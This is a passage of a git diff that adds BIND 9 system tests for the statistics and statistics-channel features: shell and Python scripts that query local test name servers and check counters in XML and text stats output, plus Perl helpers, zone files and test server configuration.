Inc. ("ISC") +# +# SPDX-License-Identifier: MPL-2.0 +# +# This Source Code Form is subject to the terms of the Mozilla Public +# License, v. 2.0. If a copy of the MPL was not distributed with this +# file, you can obtain one at https://mozilla.org/MPL/2.0/. +# +# See the COPYRIGHT file distributed with this work for additional +# information regarding copyright ownership. + +SYSTEMTESTTOP=.. +. $SYSTEMTESTTOP/conf.sh + +copy_setports ns1/named.conf.in ns1/named.conf +copy_setports ns2/named.conf.in ns2/named.conf +copy_setports ns3/named.conf.in ns3/named.conf diff --git a/bin/tests/system/statistics/tests.sh b/bin/tests/system/statistics/tests.sh new file mode 100644 index 0000000..5e0b237 --- /dev/null +++ b/bin/tests/system/statistics/tests.sh @@ -0,0 +1,280 @@ +#!/bin/sh + +# Copyright (C) Internet Systems Consortium, Inc. ("ISC") +# +# SPDX-License-Identifier: MPL-2.0 +# +# This Source Code Form is subject to the terms of the Mozilla Public +# License, v. 2.0. If a copy of the MPL was not distributed with this +# file, you can obtain one at https://mozilla.org/MPL/2.0/. +# +# See the COPYRIGHT file distributed with this work for additional +# information regarding copyright ownership. + +SYSTEMTESTTOP=.. +. $SYSTEMTESTTOP/conf.sh + +DIGOPTS="+tcp +noadd +nosea +nostat +noquest +nocomm +nocmd" +DIGCMD="$DIG $DIGOPTS -p ${PORT}" +RNDCCMD="$RNDC -p ${CONTROLPORT} -c ../common/rndc.conf" + +status=0 + +ret=0 +n=1 +stats=0 +rndc_stats() { + _ns=$1 + _ip=$2 + + $RNDCCMD -s $_ip stats > /dev/null 2>&1 || return 1 + [ -f "${_ns}/named.stats" ] || return 1 + + last_stats=named.stats.$_ns-$stats-$n + mv ${_ns}/named.stats $last_stats + stats=$((stats+1)) +} + +echo_i "fetching a.example from ns2's initial configuration ($n)" +$DIGCMD +noauth a.example. @10.53.0.2 any > dig.out.ns2.1 || ret=1 +if [ $ret != 0 ]; then echo_i "failed"; fi +status=`expr $status + $ret` +n=`expr $n + 1` + +ret=0 +echo_i "dumping initial stats for ns2 ($n)" +rndc_stats ns2 10.53.0.2 || ret=1 +if [ $ret != 0 ]; then echo_i "failed"; fi +status=`expr $status + $ret` +n=`expr $n + 1` + +ret=0 +echo_i "verifying adb records in named.stats ($n)" +grep "ADB stats" $last_stats > /dev/null || ret=1 +if [ $ret != 0 ]; then echo_i "failed"; fi +status=`expr $status + $ret` +n=`expr $n + 1` + +echo_i "checking for 1 entry in adb hash table in named.stats ($n)" +grep "1 Addresses in hash table" $last_stats > /dev/null || ret=1 +if [ $ret != 0 ]; then echo_i "failed"; fi +status=`expr $status + $ret` +n=`expr $n + 1` + +ret=0 +echo_i "verifying cache statistics in named.stats ($n)" +grep "Cache Statistics" $last_stats > /dev/null || ret=1 +if [ $ret != 0 ]; then echo_i "failed"; fi +status=`expr $status + $ret` +n=`expr $n + 1` + +ret=0 +echo_i "checking for 2 entries in adb hash table in named.stats ($n)" +$DIGCMD a.example.info. @10.53.0.2 any > /dev/null 2>&1 +rndc_stats ns2 10.53.0.2 || ret=1 +grep "2 Addresses in hash table" $last_stats > /dev/null || ret=1 +if [ $ret != 0 ]; then echo_i "failed"; fi +status=`expr $status + $ret` +n=`expr $n + 1` + +ret=0 +echo_i "dumping initial stats for ns3 ($n)" +rndc_stats ns3 10.53.0.3 || ret=1 +if [ ! "$CYGWIN" ]; then + nsock0nstat=`grep "UDP/IPv4 sockets active" $last_stats | awk '{print $1}'` + [ 0 -ne ${nsock0nstat:-0} ] || ret=1 +fi +if [ $ret != 0 ]; then echo_i "failed"; fi +status=`expr $status + $ret` +n=`expr $n + 1` + +echo_i "sending queries to ns3" +$DIGCMD +tries=2 +time=1 +recurse @10.53.0.3 foo.info. any > /dev/null 2>&1 + +ret=0 +echo_i "dumping updated stats for ns3 ($n)" +getstats() { + rndc_stats ns3 10.53.0.3 || return 1 + grep "2 recursing clients" $last_stats > /dev/null || return 1 +} +retry_quiet 5 getstats || ret=1 +if [ $ret != 0 ]; then echo_i "failed"; fi +status=`expr $status + $ret` +n=`expr $n + 1` + +ret=0 +echo_i "verifying recursing clients output in named.stats ($n)" +grep "2 recursing clients" $last_stats > /dev/null || ret=1 +if [ $ret != 0 ]; then echo_i "failed"; fi +status=`expr $status + $ret` +n=`expr $n + 1` + +ret=0 +echo_i "verifying active fetches output in named.stats ($n)" +grep "1 active fetches" $last_stats > /dev/null || ret=1 +if [ $ret != 0 ]; then echo_i "failed"; fi +status=`expr $status + $ret` +n=`expr $n + 1` + +if [ ! "$CYGWIN" ]; then + ret=0 + echo_i "verifying active sockets output in named.stats ($n)" + nsock1nstat=`grep "UDP/IPv4 sockets active" $last_stats | awk '{print $1}'` + [ `expr ${nsock1nstat:-0} - ${nsock0nstat:-0}` -eq 1 ] || ret=1 + if [ $ret != 0 ]; then echo_i "failed"; fi + status=`expr $status + $ret` + n=`expr $n + 1` +fi + +# there should be 1 UDP and no TCP queries. As the TCP counter is zero +# no status line is emitted. +ret=0 +echo_i "verifying queries in progress in named.stats ($n)" +grep "1 UDP queries in progress" $last_stats > /dev/null || ret=1 +grep "TCP queries in progress" $last_stats > /dev/null && ret=1 +if [ $ret != 0 ]; then echo_i "failed"; fi +status=`expr $status + $ret` +n=`expr $n + 1` + +ret=0 +echo_i "verifying bucket size output ($n)" +grep "bucket size" $last_stats > /dev/null || ret=1 +if [ $ret != 0 ]; then echo_i "failed"; fi +status=`expr $status + $ret` +n=`expr $n + 1` + +ret=0 +echo_i "checking priming queries are counted ($n)" +grep "priming queries" $last_stats > /dev/null || ret=1 +if [ $ret != 0 ]; then echo_i "failed"; fi +status=`expr $status + $ret` +n=`expr $n + 1` + +ret=0 +echo_i "checking that zones with slash are properly shown in XML output ($n)" +if $FEATURETEST --have-libxml2 && [ -x ${CURL} ] ; then + ${CURL} http://10.53.0.1:${EXTRAPORT1}/xml/v3/zones > curl.out.${n} 2>/dev/null || ret=1 + grep '<zone name="32/1.0.0.127-in-addr.example" rdataclass="IN">' curl.out.${n} > /dev/null || ret=1 +else + echo_i "skipping test as libxml2 and/or curl was not found" +fi +if [ $ret != 0 ]; then echo_i "failed"; fi +status=`expr $status + $ret` +n=`expr $n + 1` + +ret=0 +echo_i "checking that zones return their type ($n)" +if $FEATURETEST --have-libxml2 && [ -x ${CURL} ] ; then + ${CURL} http://10.53.0.1:${EXTRAPORT1}/xml/v3/zones > curl.out.${n} 2>/dev/null || ret=1 + grep '<zone name="32/1.0.0.127-in-addr.example" rdataclass="IN"><type>master</type>' curl.out.${n} > /dev/null || ret=1 +else + echo_i "skipping test as libxml2 and/or curl was not found" +fi +if [ $ret != 0 ]; then echo_i "failed"; fi +status=`expr $status + $ret` +n=`expr $n + 1` + +ret=0 +echo_i "checking bind9.xsl vs xml ($n)" +if $FEATURETEST --have-libxml2 && [ -x "${CURL}" ] && [ -x "${XSLTPROC}" ] ; then + $DIGCMD +notcp +recurse @10.53.0.3 soa . > /dev/null 2>&1 + $DIGCMD +notcp +recurse @10.53.0.3 soa example > /dev/null 2>&1 + ${CURL} http://10.53.0.3:${EXTRAPORT1}/xml/v3 > curl.out.${n}.xml 2>/dev/null || ret=1 + ${CURL} http://10.53.0.3:${EXTRAPORT1}/bind9.xsl > curl.out.${n}.xsl 2>/dev/null || ret=1 + ${XSLTPROC} curl.out.${n}.xsl - < curl.out.${n}.xml > xsltproc.out.${n} 2>/dev/null || ret=1 + cp curl.out.${n}.xml stats.xml.out || ret=1 + + # + # grep for expected sections. + # + grep "<h1>ISC Bind 9 Configuration and Statistics</h1>" xsltproc.out.${n} >/dev/null || ret=1 + grep "<h2>Server Status</h2>" xsltproc.out.${n} >/dev/null || ret=1 + grep "<h2>Incoming Requests by DNS Opcode</h2>" xsltproc.out.${n} >/dev/null || ret=1 + grep "<h3>Incoming Queries by Query Type</h3>" xsltproc.out.${n} >/dev/null || ret=1 + grep "<h2>Outgoing Queries per view</h2>" xsltproc.out.${n} >/dev/null || ret=1 + grep "<h3>View " xsltproc.out.${n} >/dev/null || ret=1 + grep "<h2>Server Statistics</h2>" xsltproc.out.${n} >/dev/null || ret=1 + grep "<h2>Zone Maintenance Statistics</h2>" xsltproc.out.${n} >/dev/null || ret=1 + grep "<h2>Resolver Statistics (Common)</h2>" xsltproc.out.${n} >/dev/null || ret=1 + grep "<h3>Resolver Statistics for View " xsltproc.out.${n} >/dev/null || ret=1 + grep "<h3>ADB Statistics for View " xsltproc.out.${n} >/dev/null || ret=1 + grep "<h3>Cache Statistics for View " xsltproc.out.${n} >/dev/null || ret=1 + # grep "<h3>Cache DB RRsets for View " xsltproc.out.${n} >/dev/null || ret=1 + grep "<h2>Traffic Size Statistics</h2>" xsltproc.out.${n} >/dev/null || ret=1 + grep "<h4>UDP Requests Received</h4>" xsltproc.out.${n} >/dev/null || ret=1 + grep "<h4>UDP Responses Sent</h4>" xsltproc.out.${n} >/dev/null || ret=1 + grep "<h4>TCP Requests Received</h4>" xsltproc.out.${n} >/dev/null || ret=1 + grep "<h4>TCP Responses Sent</h4>" xsltproc.out.${n} >/dev/null || ret=1 + grep "<h2>Socket I/O Statistics</h2>" xsltproc.out.${n} >/dev/null || ret=1 + grep "<h3>Zones for View " xsltproc.out.${n} >/dev/null || ret=1 + grep "<h2>Received QTYPES per view/zone</h2>" xsltproc.out.${n} >/dev/null || ret=1 + grep "<h3>View _default" xsltproc.out.${n} >/dev/null || ret=1 + grep "<h4>Zone example" xsltproc.out.${n} >/dev/null || ret=1 + grep "<h2>Response Codes per view/zone</h2>" xsltproc.out.${n} >/dev/null || ret=1 + grep "<h3>View _default" xsltproc.out.${n} >/dev/null || ret=1 + grep "<h4>Zone example" xsltproc.out.${n} >/dev/null || ret=1 + # grep "<h2>Glue cache statistics</h2>" xsltproc.out.${n} >/dev/null || ret=1 + grep "<h3>View _default" xsltproc.out.${n} >/dev/null || ret=1 + grep "<h4>Zone example" xsltproc.out.${n} >/dev/null || ret=1 + grep "<h2>Network Status</h2>" xsltproc.out.${n} >/dev/null || ret=1 + grep "<h2>Task Manager Configuration</h2>" xsltproc.out.${n} >/dev/null || ret=1 + grep "<h2>Tasks</h2>" xsltproc.out.${n} >/dev/null || ret=1 + grep "<h2>Memory Usage Summary</h2>" xsltproc.out.${n} >/dev/null || ret=1 + grep "<h2>Memory Contexts</h2>" xsltproc.out.${n} >/dev/null || ret=1 +else + echo_i "skipping test as libxml2 and/or curl and/or xsltproc was not found" +fi +if [ $ret != 0 ]; then echo_i "failed"; fi +status=`expr $status + $ret` +n=`expr $n + 1` + +ret=0 +echo_i "checking bind9.xml socket statistics ($n)" +if $FEATURETEST --have-libxml2 && [ -x "${CURL}" ] && [ -x "${XSLTPROC}" ] ; then + # Socket statistics (expect no errors) + grep "<counter name=\"TCP4AcceptFail\">0</counter>" stats.xml.out >/dev/null || ret=1 + grep "<counter name=\"TCP4BindFail\">0</counter>" stats.xml.out >/dev/null || ret=1 + grep "<counter name=\"TCP4ConnFail\">0</counter>" stats.xml.out >/dev/null || ret=1 + grep "<counter name=\"TCP4OpenFail\">0</counter>" stats.xml.out >/dev/null || ret=1 + grep "<counter name=\"TCP4RecvErr\">0</counter>" stats.xml.out >/dev/null || ret=1 + grep "<counter name=\"TCP4SendErr\">0</counter>" stats.xml.out >/dev/null || ret=1 + + grep "<counter name=\"TCP6AcceptFail\">0</counter>" stats.xml.out >/dev/null || ret=1 + grep "<counter name=\"TCP6BindFail\">0</counter>" stats.xml.out >/dev/null || ret=1 + grep "<counter name=\"TCP6ConnFail\">0</counter>" stats.xml.out >/dev/null || ret=1 + grep "<counter name=\"TCP6OpenFail\">0</counter>" stats.xml.out >/dev/null || ret=1 + grep "<counter name=\"TCP6RecvErr\">0</counter>" stats.xml.out >/dev/null || ret=1 + grep "<counter name=\"TCP6SendErr\">0</counter>" stats.xml.out >/dev/null || ret=1 +else + echo_i "skipping test as libxml2 and/or curl and/or xsltproc was not found" +fi +if [ $ret != 0 ]; then echo_i "failed"; fi +status=`expr $status + $ret` +n=`expr $n + 1` + +echo_i "Check that 'zone-statistics full;' is processed by 'rndc reconfig' ($n)" +ret=0 +# off by default +rndc_stats ns2 10.53.0.2 || ret=1 +sed -n '/Per Zone Query Statistics/,/^++/p' $last_stats | grep -F '[example]' > /dev/null && ret=0 +# turn on +copy_setports ns2/named2.conf.in ns2/named.conf +rndc_reconfig ns2 10.53.0.2 +rndc_stats ns2 10.53.0.2 || ret=1 +sed -n '/Per Zone Query Statistics/,/^++/p' $last_stats | grep -F '[example]' > /dev/null || ret=1 +# turn off +copy_setports ns2/named.conf.in ns2/named.conf +rndc_reconfig ns2 10.53.0.2 +rndc_stats ns2 10.53.0.2 || ret=1 +sed -n '/Per Zone Query Statistics/,/^++/p' $last_stats | grep -F '[example]' > /dev/null && ret=0 +# turn on +copy_setports ns2/named2.conf.in ns2/named.conf +rndc_reconfig ns2 10.53.0.2 +rndc_stats ns2 10.53.0.2 || ret=1 +sed -n '/Per Zone Query Statistics/,/^++/p' $last_stats | grep -F '[example]' > /dev/null || ret=1 +if [ $ret != 0 ]; then echo_i "failed"; fi +status=`expr $status + $ret` +n=`expr $n + 1` + +echo_i "exit status: $status" +[ $status -eq 0 ] || exit 1 diff --git a/bin/tests/system/statschannel/clean.sh b/bin/tests/system/statschannel/clean.sh new file mode 100644 index 0000000..5ad2a2c --- /dev/null +++ b/bin/tests/system/statschannel/clean.sh @@ -0,0 +1,32 @@ +#!/bin/sh + +# Copyright (C) Internet Systems Consortium, Inc. ("ISC") +# +# SPDX-License-Identifier: MPL-2.0 +# +# This Source Code Form is subject to the terms of the Mozilla Public +# License, v. 2.0. If a copy of the MPL was not distributed with this +# file, you can obtain one at https://mozilla.org/MPL/2.0/. +# +# See the COPYRIGHT file distributed with this work for additional +# information regarding copyright ownership. + +rm -f compressed.headers regular.headers compressed.out regular.out +rm -f dig.out* +rm -f ns*/managed-keys.bind* +rm -f ns*/named.conf +rm -f ns*/named.lock +rm -f ns*/named.memstats +rm -f ns*/named.run* +rm -f ns*/named.stats +rm -f ns*/signzone.out.* +rm -f ns2/*.db.signed* ns2/dsset-*. ns2/*.jbk +rm -f ns2/Kdnssec* ns2/dnssec.*.id +rm -f ns2/Kmanykeys* ns2/manykeys.*.id +rm -f ns2/dnssec.db.signed* ns2/dsset-dnssec. +rm -f ns3/*.db +rm -f traffic traffic.out.* traffic.json.* traffic.xml.* +rm -f xml.*mem json.*mem +rm -f xml.*stats json.*stats +rm -f zones zones.out.* zones.json.* zones.xml.* zones.expect.* +rm -rf ./__pycache__ diff --git a/bin/tests/system/statschannel/conftest.py b/bin/tests/system/statschannel/conftest.py new file mode 100644 index 0000000..363dd7a --- /dev/null +++ b/bin/tests/system/statschannel/conftest.py @@ -0,0 +1,25 @@ +# Copyright (C) Internet Systems Consortium, Inc. ("ISC") +# +# SPDX-License-Identifier: MPL-2.0 +# +# This Source Code Form is subject to the terms of the Mozilla Public +# License, v. 2.0. If a copy of the MPL was not distributed with this +# file, you can obtain one at https://mozilla.org/MPL/2.0/. +# +# See the COPYRIGHT file distributed with this work for additional +# information regarding copyright ownership. + +import os +import pytest + + +@pytest.fixture +def statsport(request): + # pylint: disable=unused-argument + env_port = os.getenv("EXTRAPORT1") + if env_port is None: + env_port = 5301 + else: + env_port = int(env_port) + + return env_port diff --git a/bin/tests/system/statschannel/fetch.pl b/bin/tests/system/statschannel/fetch.pl new file mode 100644 index 0000000..b09ed54 --- /dev/null +++ b/bin/tests/system/statschannel/fetch.pl @@ -0,0 +1,43 @@ +#!/usr/bin/perl + +# Copyright (C) Internet Systems Consortium, Inc. ("ISC") +# +# SPDX-License-Identifier: MPL-2.0 +# +# This Source Code Form is subject to the terms of the Mozilla Public +# License, v. 2.0. If a copy of the MPL was not distributed with this +# file, you can obtain one at https://mozilla.org/MPL/2.0/. +# +# See the COPYRIGHT file distributed with this work for additional +# information regarding copyright ownership. + +# fetch.pl: +# Simple script to fetch HTTP content from the statistics channel +# of a BIND server. Fetches the full XML stats from 10.53.0.2 port +# 8853 by default; these can be overridden by command line arguments. + +use File::Fetch; +use Getopt::Std; + +sub usage { + print ("Usage: fetch.pl [-s address] [-p port] [path]\n"); + exit 1; +} + +my %options={}; +getopts("s:p:", \%options); + +my $addr = "10.53.0.2"; +$addr = $options{s} if defined $options{s}; + +my $path = 'xml/v3'; +if (@ARGV >= 1) { + $path = shift @ARGV; +} + +my $port = 8853; +$port = $options{p} if defined $options{p}; + +my $ff = File::Fetch->new(uri => "http://$addr:$port/$path"); +my $file = $ff->fetch() or die $ff->error; +print ("$file\n"); diff --git a/bin/tests/system/statschannel/generic.py b/bin/tests/system/statschannel/generic.py new file mode 100644 index 0000000..5ff09e2 --- /dev/null +++ b/bin/tests/system/statschannel/generic.py @@ -0,0 +1,106 @@ +# Copyright (C) Internet Systems Consortium, Inc. ("ISC") +# +# SPDX-License-Identifier: MPL-2.0 +# +# This Source Code Form is subject to the terms of the Mozilla Public +# License, v. 2.0. If a copy of the MPL was not distributed with this +# file, you can obtain one at https://mozilla.org/MPL/2.0/. +# +# See the COPYRIGHT file distributed with this work for additional +# information regarding copyright ownership. + +from datetime import datetime, timedelta +import os + + +# ISO datetime format without msec +fmt = "%Y-%m-%dT%H:%M:%SZ" + +# The constants were taken from BIND 9 source code (lib/dns/zone.c) +max_refresh = timedelta(seconds=2419200) # 4 weeks +max_expires = timedelta(seconds=14515200) # 24 weeks +now = datetime.utcnow().replace(microsecond=0) +dayzero = datetime.utcfromtimestamp(0).replace(microsecond=0) + + +# Generic helper functions +def check_expires(expires, min_time, max_time): + assert expires >= min_time + assert expires <= max_time + + +def check_refresh(refresh, min_time, max_time): + assert refresh >= min_time + assert refresh <= max_time + + +def check_loaded(loaded, expected): + # Sanity check the zone timers values + assert loaded == expected + assert loaded < now + + +def check_zone_timers(loaded, expires, refresh, loaded_exp): + # Sanity checks the zone timers values + if expires is not None: + check_expires(expires, now, now + max_expires) + if refresh is not None: + check_refresh(refresh, now, now + max_refresh) + check_loaded(loaded, loaded_exp) + + +# +# The output is gibberish, but at least make sure it does not crash. +# +def check_manykeys(name, zone=None): + # pylint: disable=unused-argument + assert name == "manykeys" + + +def zone_mtime(zonedir, name): + try: + si = os.stat(os.path.join(zonedir, "{}.db".format(name))) + except FileNotFoundError: + return dayzero + + mtime = datetime.utcfromtimestamp(si.st_mtime).replace(microsecond=0) + + return mtime + + +def test_zone_timers_primary(fetch_zones, load_timers, **kwargs): + statsip = kwargs["statsip"] + statsport = kwargs["statsport"] + zonedir = kwargs["zonedir"] + + zones = fetch_zones(statsip, statsport) + + for zone in zones: + (name, loaded, expires, refresh) = load_timers(zone, True) + mtime = zone_mtime(zonedir, name) + check_zone_timers(loaded, expires, refresh, mtime) + + +def test_zone_timers_secondary(fetch_zones, load_timers, **kwargs): + statsip = kwargs["statsip"] + statsport = kwargs["statsport"] + zonedir = kwargs["zonedir"] + + zones = fetch_zones(statsip, statsport) + + for zone in zones: + (name, loaded, expires, refresh) = load_timers(zone, False) + mtime = zone_mtime(zonedir, name) + check_zone_timers(loaded, expires, refresh, mtime) + + +def test_zone_with_many_keys(fetch_zones, load_zone, **kwargs): + statsip = kwargs["statsip"] + statsport = kwargs["statsport"] + + zones = fetch_zones(statsip, statsport) + + for zone in zones: + name = load_zone(zone) + if name == "manykeys": + check_manykeys(name) diff --git a/bin/tests/system/statschannel/generic_dnspython.py b/bin/tests/system/statschannel/generic_dnspython.py new file mode 100644 index 0000000..34a0398 --- /dev/null +++ b/bin/tests/system/statschannel/generic_dnspython.py @@ -0,0 +1,128 @@ +# Copyright (C) Internet Systems Consortium, Inc. ("ISC") +# +# SPDX-License-Identifier: MPL-2.0 +# +# This Source Code Form is subject to the terms of the Mozilla Public +# License, v. 2.0. If a copy of the MPL was not distributed with this +# file, you can obtain one at https://mozilla.org/MPL/2.0/. +# +# See the COPYRIGHT file distributed with this work for additional +# information regarding copyright ownership. + +from collections import defaultdict + +import dns.message +import dns.query +import dns.rcode + + +TIMEOUT = 10 + + +def create_msg(qname, qtype): + msg = dns.message.make_query( + qname, qtype, want_dnssec=True, use_edns=0, payload=4096 + ) + + return msg + + +def udp_query(ip, port, msg): + ans = dns.query.udp(msg, ip, TIMEOUT, port=port) + assert ans.rcode() == dns.rcode.NOERROR + + return ans + + +def tcp_query(ip, port, msg): + ans = dns.query.tcp(msg, ip, TIMEOUT, port=port) + assert ans.rcode() == dns.rcode.NOERROR + + return ans + + +def create_expected(data): + expected = { + "dns-tcp-requests-sizes-received-ipv4": defaultdict(int), + "dns-tcp-responses-sizes-sent-ipv4": defaultdict(int), + "dns-tcp-requests-sizes-received-ipv6": defaultdict(int), + "dns-tcp-responses-sizes-sent-ipv6": defaultdict(int), + "dns-udp-requests-sizes-received-ipv4": defaultdict(int), + "dns-udp-requests-sizes-received-ipv6": defaultdict(int), + "dns-udp-responses-sizes-sent-ipv4": defaultdict(int), + "dns-udp-responses-sizes-sent-ipv6": defaultdict(int), + } + + for k, v in data.items(): + for kk, vv in v.items(): + expected[k][kk] += vv + + return expected + + +def update_expected(expected, key, msg): + msg_len = len(msg.to_wire()) + bucket_num = (msg_len // 16) * 16 + bucket = "{}-{}".format(bucket_num, bucket_num + 15) + + expected[key][bucket] += 1 + + +def check_traffic(data, expected): + def ordered(obj): + if isinstance(obj, dict): + return sorted((k, ordered(v)) for k, v in obj.items()) + if isinstance(obj, list): + return sorted(ordered(x) for x in obj) + return obj + + ordered_data = ordered(data) + ordered_expected = ordered(expected) + + assert len(ordered_data) == 8 + assert len(ordered_expected) == 8 + assert len(data) == len(ordered_data) + assert len(expected) == len(ordered_expected) + + assert ordered_data == ordered_expected + + +def test_traffic(fetch_traffic, **kwargs): + statsip = kwargs["statsip"] + statsport = kwargs["statsport"] + port = kwargs["port"] + + data = fetch_traffic(statsip, statsport) + exp = create_expected(data) + + msg = create_msg("short.example.", "TXT") + update_expected(exp, "dns-udp-requests-sizes-received-ipv4", msg) + ans = udp_query(statsip, port, msg) + update_expected(exp, "dns-udp-responses-sizes-sent-ipv4", ans) + data = fetch_traffic(statsip, statsport) + + check_traffic(data, exp) + + msg = create_msg("long.example.", "TXT") + update_expected(exp, "dns-udp-requests-sizes-received-ipv4", msg) + ans = udp_query(statsip, port, msg) + update_expected(exp, "dns-udp-responses-sizes-sent-ipv4", ans) + data = fetch_traffic(statsip, statsport) + + check_traffic(data, exp) + + msg = create_msg("short.example.", "TXT") + update_expected(exp, "dns-tcp-requests-sizes-received-ipv4", msg) + ans = tcp_query(statsip, port, msg) + update_expected(exp, "dns-tcp-responses-sizes-sent-ipv4", ans) + data = fetch_traffic(statsip, statsport) + + check_traffic(data, exp) + + msg = create_msg("long.example.", "TXT") + update_expected(exp, "dns-tcp-requests-sizes-received-ipv4", msg) + ans = tcp_query(statsip, port, msg) + update_expected(exp, "dns-tcp-responses-sizes-sent-ipv4", ans) + data = fetch_traffic(statsip, statsport) + + check_traffic(data, exp) diff --git a/bin/tests/system/statschannel/mem-xml.pl b/bin/tests/system/statschannel/mem-xml.pl new file mode 100644 index 0000000..4483aae --- /dev/null +++ b/bin/tests/system/statschannel/mem-xml.pl @@ -0,0 +1,21 @@ +#!/usr/bin/perl + +# Copyright (C) Internet Systems Consortium, Inc. ("ISC") +# +# SPDX-License-Identifier: MPL-2.0 +# +# This Source Code Form is subject to the terms of the Mozilla Public +# License, v. 2.0. If a copy of the MPL was not distributed with this +# file, you can obtain one at https://mozilla.org/MPL/2.0/. +# +# See the COPYRIGHT file distributed with this work for additional +# information regarding copyright ownership. + +# server-xml.pl: +# Parses the XML version of the server stats into a normalized format. + +use XML::Simple; +use Data::Dumper; + +my $ref = XMLin("xml.mem"); +print Dumper($ref); diff --git a/bin/tests/system/statschannel/ns1/example.db b/bin/tests/system/statschannel/ns1/example.db new file mode 100644 index 0000000..5c2635e --- /dev/null +++ b/bin/tests/system/statschannel/ns1/example.db @@ -0,0 +1,49 @@ +; Copyright (C) Internet Systems Consortium, Inc. ("ISC") +; +; SPDX-License-Identifier: MPL-2.0 +; +; This Source Code Form is subject to the terms of the Mozilla Public +; License, v. 2.0. If a copy of the MPL was not distributed with this +; file, you can obtain one at https://mozilla.org/MPL/2.0/. +; +; See the COPYRIGHT file distributed with this work for additional +; information regarding copyright ownership. + +$ORIGIN . +$TTL 300 ; 5 minutes +example IN SOA mname1. . ( + 1 ; serial + 20 ; refresh (20 seconds) + 20 ; retry (20 seconds) + 1814400 ; expire (3 weeks) + 3600 ; minimum (1 hour) + ) +example. NS ns2.example. +ns2.example. A 10.53.0.2 + +$ORIGIN example. +a A 10.0.0.1 + MX 10 mail.example. +short TXT "short text" +long TXT ( + "longlonglonglonglonglonglonglonglonglong" + "longlonglonglonglonglonglonglonglonglong" + "longlonglonglonglonglonglonglonglonglong" + "longlonglonglonglonglonglonglonglonglong" + "longlonglonglonglonglonglonglonglonglong" + "longlonglonglonglonglonglonglonglonglong" + "longlonglonglonglonglonglonglonglonglong" + "longlonglonglonglonglonglonglonglonglong" + "longlonglonglonglonglonglonglonglonglong" + "longlonglonglonglonglonglonglonglonglong" + "longlonglonglonglonglonglonglonglonglong" + "longlonglonglonglonglonglonglonglonglong" + "longlonglonglonglonglonglonglonglonglong" + "longlonglonglonglonglonglonglonglonglong" + "longlonglonglonglonglonglonglonglonglong" + "longlonglonglonglonglonglonglonglonglong" + "longlonglonglonglonglonglonglonglonglong" + "longlonglonglonglonglonglonglonglonglong" + ) + +mail A 10.0.0.2 diff --git a/bin/tests/system/statschannel/ns1/named.conf.in b/bin/tests/system/statschannel/ns1/named.conf.in new file mode 100644 index 0000000..04ead33 --- /dev/null +++ b/bin/tests/system/statschannel/ns1/named.conf.in @@ -0,0 +1,43 @@ +/* + * Copyright (C) Internet Systems Consortium, Inc. ("ISC") + * + * SPDX-License-Identifier: MPL-2.0 + * + * This Source Code Form is subject to the terms of the Mozilla Public + * License, v. 2.0. If a copy of the MPL was not distributed with this + * file, you can obtain one at https://mozilla.org/MPL/2.0/. + * + * See the COPYRIGHT file distributed with this work for additional + * information regarding copyright ownership. + */ + +options { + query-source address 10.53.0.1; + notify-source 10.53.0.1; + transfer-source 10.53.0.1; + port @PORT@; + pid-file "named.pid"; + listen-on { 10.53.0.1; }; + listen-on-v6 { none; }; + recursion no; + notify explicit; + minimal-responses no; + version none; // make statistics independent of the version number +}; + +statistics-channels { inet 10.53.0.1 port @EXTRAPORT1@ allow { localhost; }; }; + +key rndc_key { + secret "1234abcd8765"; + algorithm hmac-sha256; +}; + +controls { + inet 10.53.0.1 port @CONTROLPORT@ allow { any; } keys { rndc_key; }; +}; + +zone "example" { + type primary; + file "example.db"; + allow-transfer { any; }; +}; diff --git a/bin/tests/system/statschannel/ns2/dnssec.db.in b/bin/tests/system/statschannel/ns2/dnssec.db.in new file mode 100644 index 0000000..90ae166 --- /dev/null +++ b/bin/tests/system/statschannel/ns2/dnssec.db.in @@ -0,0 +1,28 @@ +; Copyright (C) Internet Systems Consortium, Inc. ("ISC") +; +; SPDX-License-Identifier: MPL-2.0 +; +; This Source Code Form is subject to the terms of the Mozilla Public +; License, v. 2.0. If a copy of the MPL was not distributed with this +; file, you can obtain one at https://mozilla.org/MPL/2.0/. +; +; See the COPYRIGHT file distributed with this work for additional +; information regarding copyright ownership. + +$ORIGIN . +$TTL 300 + +dnssec. IN SOA mname1. . ( + 1 ; serial + 20 ; refresh (20 seconds) + 20 ; retry (20 seconds) + 1814400 ; expire (3 weeks) + 3600 ; minimum (1 hour) + ) +dnssec. NS ns2.dnssec. +ns2.dnssec. A 10.53.0.2 + +$ORIGIN dnssec. +a A 10.0.0.1 + MX 10 mail.dnssec. +mail A 10.0.0.2 diff --git a/bin/tests/system/statschannel/ns2/example.db b/bin/tests/system/statschannel/ns2/example.db new file mode 100644 index 0000000..5c2635e --- /dev/null +++ b/bin/tests/system/statschannel/ns2/example.db @@ -0,0 +1,49 @@ +; Copyright (C) Internet Systems Consortium, Inc. ("ISC") +; +; SPDX-License-Identifier: MPL-2.0 +; +; This Source Code Form is subject to the terms of the Mozilla Public +; License, v. 2.0. If a copy of the MPL was not distributed with this +; file, you can obtain one at https://mozilla.org/MPL/2.0/. +; +; See the COPYRIGHT file distributed with this work for additional +; information regarding copyright ownership. + +$ORIGIN . +$TTL 300 ; 5 minutes +example IN SOA mname1. . ( + 1 ; serial + 20 ; refresh (20 seconds) + 20 ; retry (20 seconds) + 1814400 ; expire (3 weeks) + 3600 ; minimum (1 hour) + ) +example. NS ns2.example. +ns2.example. A 10.53.0.2 + +$ORIGIN example. +a A 10.0.0.1 + MX 10 mail.example. +short TXT "short text" +long TXT ( + "longlonglonglonglonglonglonglonglonglong" + "longlonglonglonglonglonglonglonglonglong" + "longlonglonglonglonglonglonglonglonglong" + "longlonglonglonglonglonglonglonglonglong" + "longlonglonglonglonglonglonglonglonglong" + "longlonglonglonglonglonglonglonglonglong" + "longlonglonglonglonglonglonglonglonglong" + "longlonglonglonglonglonglonglonglonglong" + "longlonglonglonglonglonglonglonglonglong" + "longlonglonglonglonglonglonglonglonglong" + "longlonglonglonglonglonglonglonglonglong" + "longlonglonglonglonglonglonglonglonglong" + "longlonglonglonglonglonglonglonglonglong" + "longlonglonglonglonglonglonglonglonglong" + "longlonglonglonglonglonglonglonglonglong" + "longlonglonglonglonglonglonglonglonglong" + "longlonglonglonglonglonglonglonglonglong" + "longlonglonglonglonglonglonglonglonglong" + ) + +mail A 10.0.0.2 diff --git a/bin/tests/system/statschannel/ns2/manykeys.db.in b/bin/tests/system/statschannel/ns2/manykeys.db.in new file mode 100644 index 0000000..3281a39 --- /dev/null +++ b/bin/tests/system/statschannel/ns2/manykeys.db.in @@ -0,0 +1,28 @@ 